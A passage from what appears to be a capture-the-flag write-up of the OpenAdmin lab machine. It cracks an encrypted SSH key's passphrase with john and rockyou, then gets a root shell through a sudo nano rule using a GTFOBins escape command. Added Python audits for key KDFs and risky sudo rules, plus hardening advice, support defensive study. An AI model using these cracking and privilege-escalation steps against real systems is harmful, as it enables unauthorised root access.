XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----

Decrypt Key: The key is passphrase-protected (Proc-Type: 4,ENCRYPTED), but john breaks it instantly with rockyou:

┌──(kali💀kali)-[~/Desktop]
└─$ nano hash    

┌──(kali💀kali)-[~/Desktop]
└─$ ssh2john hash > id_rsa.hash
┌──(kali💀kali)-[~/Desktop]
└─$ cat id_rsa.hash 
hash:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$(hex body omitted)
┌──(kali💀kali)-[~/Desktop]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (hash)   
┌──(kali💀kali)-[~/Desktop]
└─$ chmod 700 hash   

┌──(kali💀kali)-[~/Desktop]
└─$ ssh -i hash joanna@10.10.10.171
Enter passphrase for key 'hash': bloodninjas
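Why john needed no time at all is visible in its own output above: Cost 1 is 0 (MD5/AES) and the iteration count is 1, which is what the legacy PEM format (Proc-Type/DEK-Info headers) always gives you, whatever the passphrase. The audit below is an added example, not from this write-up or from OpenSSH: it reports the format, cipher and KDF of a private key file. The legacy sample is the header of the key above with its body truncated (not a usable key), the openssh-key-v1 samples are constructed headers with no key material, and the rounds threshold is an assumption.

```python
# Added example (not from this write-up or from OpenSSH): report how a private
# key file protects its passphrase. Samples are constructed or truncated and are
# not usable keys; the rounds threshold is an assumption.
import base64
import re
import struct

LEGACY_BEGIN = re.compile(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----$")
OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_END = "-----END OPENSSH PRIVATE KEY-----"
OPENSSH_MAGIC = b"openssh-key-v1\x00"
MIN_BCRYPT_ROUNDS = 16  # ssh-keygen's default; assumed floor for this audit


def _string(blob: bytes, offset: int):
    """Read one SSH wire-format string (uint32 length + bytes)."""
    (length,) = struct.unpack_from(">I", blob, offset)
    start = offset + 4
    return blob[start:start + length], start + length


def audit_private_key(text: str) -> dict:
    """Report format, cipher, KDF, rounds and findings for one private key file."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    report = {"format": None, "cipher": None, "kdf": None, "rounds": None, "findings": []}
    if LEGACY_BEGIN.match(lines[0]):
        report["format"] = "legacy-pem"
        dek = next((l.split(":", 1)[1].strip() for l in lines if l.startswith("DEK-Info:")), None)
        if any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines) and dek:
            # PEM encryption derives the cipher key with a single MD5 pass over
            # passphrase and salt: the "MD5/AES, iteration count 1" john reported.
            report.update(cipher=dek.split(",")[0], kdf="md5", rounds=1)
            report["findings"].append("legacy PEM encryption: one MD5 round, passphrase is cheap to brute-force offline")
        else:
            report["findings"].append("private key stored without a passphrase")
        return report
    if lines[0] == OPENSSH_BEGIN:
        report["format"] = "openssh-key-v1"
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _string(blob, len(OPENSSH_MAGIC))
        kdf, off = _string(blob, off)
        kdfopts, off = _string(blob, off)
        report.update(cipher=cipher.decode(), kdf=kdf.decode())
        if report["kdf"] == "bcrypt":
            _salt, pos = _string(kdfopts, 0)          # kdfoptions = string salt, uint32 rounds
            (report["rounds"],) = struct.unpack_from(">I", kdfopts, pos)
            if report["rounds"] < MIN_BCRYPT_ROUNDS:
                report["findings"].append(f"bcrypt rounds {report['rounds']} below {MIN_BCRYPT_ROUNDS}")
        else:
            report["findings"].append("private key stored without a passphrase")
        return report
    raise ValueError("unrecognised private key format")


def build_openssh_key_header(cipher: str, kdf: str, rounds: int) -> str:
    """Constructed openssh-key-v1 header (cipher, kdf, kdfoptions only, no key
    material) so the parser can be exercised offline. Not a usable key."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
    return "\n".join([OPENSSH_BEGIN, base64.b64encode(blob).decode(), OPENSSH_END])


# Header of the key shown on this page; body truncated, so this is not a usable key.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
-----END RSA PRIVATE KEY-----"""

if __name__ == "__main__":
    for label, key in [("legacy (page)", LEGACY_SAMPLE),
                       ("bcrypt 16", build_openssh_key_header("aes256-ctr", "bcrypt", 16)),
                       ("bcrypt 8", build_openssh_key_header("aes256-ctr", "bcrypt", 8)),
                       ("no passphrase", build_openssh_key_header("none", "none", 0))]:
        print(f"{label:14s} {audit_private_key(key)}")
```

A key that fails this check can be rewritten in place with ssh-keygen -p -a 100 -f key (add -o on OpenSSH older than 7.8, where the legacy format was still the default): -p re-encrypts under a new passphrase and -a sets the bcrypt rounds, so each guess costs the attacker 100 bcrypt iterations instead of one MD5. A strong passphrase still matters, but the KDF is what separates "instantly" from "never" against rockyou.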

Priv Esc: joanna –> root

Enumeration: Always check sudo on HTB, and it pays off here:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH
    XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

sudo nano: GTFOBins has a page on nano. The path to a shell from sudo is as follows:

sudo nano
^R^X
reset; sh 1>&0 2>&0
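The rule itself is the finding: nano is an editor with a built-in "execute command" feature, so granting it via sudo grants a root shell regardless of which file the rule names. The audit below is an added example, not from this write-up, sudo or GTFOBins: it parses sudo -l output and flags rules for binaries that can spawn a shell from inside the program. The binary list is a non-exhaustive assumption, the first sample is the sudo -l output from this page, and the second is a constructed rule using sudoedit instead.

```python
# Added example (not from this write-up, sudo or GTFOBins): audit 'sudo -l'
# output for rules that hand out a binary with a documented shell escape.
import os
import re

# Non-exhaustive subset of the binaries GTFOBins documents as able to spawn a
# shell or run arbitrary commands from inside the program (assumption).
SHELL_ESCAPE_BINARIES = {
    "nano", "vim", "vi", "less", "more", "man", "find", "awk", "perl",
    "python", "python3", "env", "bash", "sh", "tar", "zip",
}

# One rule line: "(runas) TAG: TAG: command, command"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(output: str) -> list:
    """Return the command rules from 'sudo -l' as dicts (runas, tags, command, binary)."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        for cmd in (c.strip() for c in m.group("cmd").split(",")):
            rules.append({
                "runas": m.group("runas").strip(), "tags": tags, "command": cmd,
                "binary": os.path.basename(cmd.split()[0]),
            })
    return rules


def audit_sudo_rules(output: str) -> list:
    """Flag rules whose binary can escape to a shell; NOPASSWD makes it critical."""
    findings = []
    for rule in parse_sudo_l(output):
        if rule["command"] != "ALL" and rule["binary"] not in SHELL_ESCAPE_BINARIES:
            continue
        findings.append({
            "command": rule["command"],
            "runas": rule["runas"],
            "severity": "critical" if "NOPASSWD" in rule["tags"] else "high",
            "reason": f"{rule['binary']} can spawn a shell or run commands as {rule['runas']}",
        })
    return findings


# The sudo -l output from this page.
SAMPLE_SUDO_L = r"""Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH
    XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
"""

# Constructed alternative: sudoedit copies the file, runs the editor as the
# invoking user, and copies the result back, so there is no root editor to escape.
SAFE_SUDO_L = """User joanna may run the following commands on openadmin:
    (root) NOPASSWD: sudoedit /opt/priv
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] {f['command']} ({f['runas']}): {f['reason']}")
    print("sudoedit rule findings:", audit_sudo_rules(SAFE_SUDO_L))
```

If the goal really is to let joanna edit /opt/priv as root, sudoedit is the rule to write; sudo's NOEXEC tag is the other mitigation, blocking the editor from exec()ing anything, but it is bypassable by programs that do not rely on exec, so sudoedit is the cleaner answer for editors.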

Not that it matters, but /opt/priv is an empty file:

joanna@openadmin:/opt$ ls -la
drwxr-xr-x  3 root     root     4096 Jan  4  2020 .
drwxr-xr-x 24 root     root     4096 Aug 17  2021 ..
drwxr-x---  7 www-data www-data 4096 Nov 21  2019 ona
-rw-r--r--  1 root     root        0 Nov 22  2019 priv

joanna@openadmin:/opt$ ls -l priv 
-rw-r--r-- 1 root root 0 Nov 22  2019 priv

I’ll run sudo /bin/nano /opt/priv and be dropped into nano:

Now I’ll hit Ctrl+r to read a file, and the menu at the bottom pops up:

Ctrl+x is “Execute Command”. Typing that gives a prompt “Command to execute: “. If I just enter /bin/sh, it will freeze, because the stdin/stdout/stderr are messed up. That’s what the reset; /bin/sh 1>&0 2>&0 fixes. When I run it, the remnants of nano are still there, but there’s a # as a prompt:

If I enter id, it works:

joanna@openadmin:/opt$ sudo /bin/nano /opt/priv

# id
uid=0(root) gid=0(root) groups=0(root)

# whoami
root

# cat /root/root.txt
a6a54----------------------------
